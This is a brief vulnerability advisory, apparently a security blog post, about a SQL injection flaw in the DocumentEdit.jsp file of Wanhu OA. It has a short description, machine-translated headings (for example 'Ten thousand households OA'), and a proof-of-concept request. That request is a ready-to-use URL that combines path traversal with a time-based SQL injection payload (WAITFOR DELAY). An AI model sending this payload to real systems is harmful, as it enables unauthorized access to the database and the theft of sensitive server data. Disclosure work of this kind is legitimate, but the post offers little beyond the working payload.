Wanhu Oa Documentedit Jsp Sql Injection Vulnerability
Wanhu Oa Documentedit Jsp Sql Injection Vulnerability
Wanhu OA DocumentEdit.jsp SQL injection vulnerability
Vulnerability Description
There is a SQL injection vulnerability in the OA DocumentEdit.jsp file in Wanhu. The attacker can inject SQL into the database by sending a special request package to obtain server-sensitive information.
Vulnerability Impact
Ten thousand households OA
Network surveying and mapping
Vulnerability reappears
Product Page
Verify POC
1
/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'--
This post is licensed under CC BY 4.0 by the author.